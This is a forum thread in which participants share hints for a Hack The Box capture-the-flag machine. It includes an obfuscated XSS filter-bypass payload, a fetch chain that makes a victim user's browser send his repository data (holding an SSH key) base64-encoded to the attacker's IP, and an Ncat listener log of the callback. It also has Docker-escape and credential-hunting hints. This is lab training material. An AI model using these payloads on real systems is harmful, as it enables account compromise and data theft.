Posts: 44 Threads: 0 Joined: N/A Posts: 213 Threads: 0 Joined: N/A July 22, 2022 at 12:05 PM (July 22, 2022, 11:36 AM)jon01 Wrote: (July 21, 2022, 10:45 AM)Exa Wrote: This is a payload which bypasses the filter:
eval.call`${"eval\x28atob`YWxlcnQoInRlc3QiKQ==`\x29"}`
Put that payload inside an img tag.
fetch() can be used here. Try fetch("http://10.10.xxx.xxx/") and you should see an incoming request from charlie.
Now let charlie request dev.snippet.htb/api/v1/users/charlie/repos and send the response back to you using fetch().then() + btoa().
In that repository is an SSH key. (Please don't post SSH keys/passwords.)
how did u done that via js , seems like i am doing some mistake. fetch('http://dev.snippet.htb/api/v1/users/charlie/repos').then(response => response.text()).then(data => fetch('http://10.10.xxx.xxx/'+btoa(data))) Posts: 9 Threads: 0 Joined: N/A (July 22, 2022, 12:05 PM)Exa Wrote: (July 22, 2022, 11:36 AM)jon01 Wrote: (July 21, 2022, 10:45 AM)Exa Wrote: This is a payload which bypasses the filter:
eval.call`${"eval\x28atob`YWxlcnQoInRlc3QiKQ==`\x29"}`
Put that payload inside an img tag.
fetch() can be used here. Try fetch("http://10.10.xxx.xxx/") and you should see an incoming request from charlie.
Now let charlie request dev.snippet.htb/api/v1/users/charlie/repos and send the response back to you using fetch().then() + btoa().
In that repository is an SSH key. (Please don't post SSH keys/passwords.)
how did u done that via js , seems like i am doing some mistake.
fetch('http://dev.snippet.htb/api/v1/users/charlie/repos').then(response => response.text()).then(data => fetch('http://10.10.xxx.xxx/'+btoa(data))) Thanks to Exa, got user...Pffffffff what a travel to go there... Posts: 44 Threads: 0 Joined: N/A Any hints on root ? For now I got nothing interesting. Looking at:
jean@extension:~$ la projects/
extension laravel-app
jean@extension:~$ Posts: 70 Threads: 0 Joined: N/A (July 22, 2022, 05:46 PM)onl1_f4ns Wrote: Any hints on root ? For now I got nothing interesting. Looking at:
jean@extension:~$ la projects/
extension laravel-app
jean@extension:~$ I am also stuck on root part. I have checked stuff with linpeas, pspy64 but nothing came to my eyes or I missed them. And then I have seen that transfer.sh file is transfering laravel files to docker stuff under root. Maybe I thought there is a cron job that run transfer.sh and updates laravel app but no. Now, I will give it another go. Posts: 44 Threads: 0 Joined: N/A [quote="farkow" pid="167847" dateline="1658524889"][quote="onl1_f4ns" pid="167579" dateline="1658511966"]Any hints on root ? For now I got nothing interesting. Looking at:jean@extension:~$ la projects/extension laravel-appjean@extension:~$[/quote]I am also stuck on root part.I have checked stuff with linpeas, pspy64 but nothing came to my eyes or I missed them.And then I have seen that transfer.sh file is transfering laravel files to docker stuff under root.Maybe I thought there is a cron job that run transfer.sh and updates laravel app but no.Now, I will give it another go.[/quote]There's a lot to check here: jean@extension:~$ netstat -altnpand I don't see our initial ?!Should be a doker stuff. Maybe we need to pwn laravel app and get root in the docker and then brake from docker to root on the host.Enumerating. Posts: 213 Threads: 0 Joined: N/A July 22, 2022 at 10:19 PM pspy shows database credentials. Posts: 70 Threads: 0 Joined: N/A July 22, 2022 at 10:21 PM Woow.. I gotta check again, I already was in the database. Blind me..
----
Thanks to Exa's comment above, I have gain access to application container.
(Man, thank you, you are a good teacher - giving only hints, and leave the rest to us if we really would like to enter the path)
I presume that my task is now;
1- be root and escsape
2- escape
Testing these two options now. Posts: 26 Threads: 0 Joined: N/A (July 22, 2022, 10:21 PM)farkow Wrote: Woow.. I gotta check again, I already was in the database. Blind me..
----
Thanks to Exa's comment above, I have gain access to application container.
(Man, thank you, you are a good teacher - giving only hints, and leave the rest to us if we really would like to enter the path)
I presume that my task is now;
1- be root and escsape
2- escape
Testing these two options now. No need for step 1. Posts: 70 Threads: 0 Joined: N/A (July 23, 2022, 02:11 PM)loge23 Wrote: (July 22, 2022, 10:21 PM)farkow Wrote: Woow.. I gotta check again, I already was in the database. Blind me..
----
Thanks to Exa's comment above, I have gain access to application container.
(Man, thank you, you are a good teacher - giving only hints, and leave the rest to us if we really would like to enter the path)
I presume that my task is now;
1- be root and escsape
2- escape
Testing these two options now.
No need for step 1. HEHEYY!! <3 Got it. |
but I can't get hit back with any eval payloads. I tried several of them. Also tried to escape `` with \` \`[code]test
test
test
test
Test on your Firefox console! Create an HTML file with your payload, and then open the console to see whether it works correctly!Then just create new issue, even if the issue shows the code, it's ok; start the Netcat on your terminal, and you will see a hit back![/quote]Thanks!How i may forget this little trick with Firefox console I was just debugging this part, not from html (that was my mistake):[code]eval.call`${'eval\x28atob`ZmV0Y2goImh0dHA6Ly8xMC4xMC4xNC42LyIp`\x29'}`eval.call`${"eval\x28atob`ZmV0Y2goImh0dHA6Ly8xMC4xMC4xNC42LyIp`\x29"}`[/code]and of course, only this part is working. Finally get hit back:[code]Ncat: Version 7.91 ( https://nmap.org/ncat )Ncat: Listening on :::80Ncat: Listening on 0.0.0.0:80Ncat: Connection from 10.10.11.171.Ncat: Connection from 10.10.11.171:51658.GET / HTTP/1.1Host: 10.10.14.xUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://dev.snippet.htbConnection: keep-alive[/code]